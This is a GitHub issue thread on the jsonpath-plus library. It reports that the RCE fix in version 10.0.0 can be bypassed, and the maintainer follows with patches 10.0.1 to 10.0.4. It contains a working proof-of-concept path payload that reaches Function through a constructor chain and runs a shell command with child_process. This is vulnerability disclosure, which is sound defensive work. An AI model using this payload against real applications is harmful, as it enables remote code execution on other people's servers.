Remote Code Execution (RCE) is still possible

[03sunf]

Describe the bug

JSONPath Plus Remote Code Execution (RCE) Vulnerability has been patched in version 10.0.0, but Remote Code Execution (RCE) is still possible with the payload below as the path value.

Code sample or steps to reproduce

const { JSONPath } = require("jsonpath-plus");

// jsonpath-plus == 10.0.0
// $[?(var _$_root=[].constructor.constructor("console.log(this.process.mainModule.require(\\"child_process\\").execSync(\\"id\\").toString())");@root())]

const result = JSONPath({
    path: '$[?(var _$_root=[].constructor.constructor("console.log(this.process.mainModule.require(\\"child_process\\").execSync(\\"id\\").toString())");@root())]',
    json: { a: "x" },
});

Expected behavior

• Potential Remote Code Execution (RCE)
• Potential Cross-site scripting (XSS)

Environment (IMPORTANT)

• JSONPath-Plus version: 10.0.0

Desktop**

• OS: macOS
• Node Version v21.7.3

CC @shpik-kr

[brettz9]

Our "safe" vm had an issue here, so switching to use that vm by default indeed did not fix the RCE bug. I've released a new patch for the safe vm which throws upon Function access within member expressions. If there are other pathways to Function or such, they may still be vulnerable.

[ChrisWarnerMA]

This is still being flagged as vulnerable by Snyk.

[chaitanyareddy-mula]

I am not sure why this is closed. I see still synk is throwing RCE.

[brettz9]

I have communicated to Synk that this issue should now be resolved (at least with the example reported). It is up to them to find the time to review and update their records.

[80avin]

A note.
The fix included will also prevent following, though not sure why would anyone expect it.

const { JSONPath } = require('jsonpath-plus');

JSONPath({ path: '$[?(_$_root.a)]', json: { a: Function } });

[brettz9]

I've released 10.0.2 to fix a vulnerability not addressed by 10.0.1. Just reported the update to Synk as well.

[brettz9]

And released 10.0.3 to fix another workaround I realized was still possible. Also reported the update.

[brettz9]

Released 10.0.4 to fix another possible evasion. Too many ways to evade detection.

[zmiele]

@brettz9 With the large amount of possible evasion methods, would it be worth considering making eval: false the default behavior for nodejs?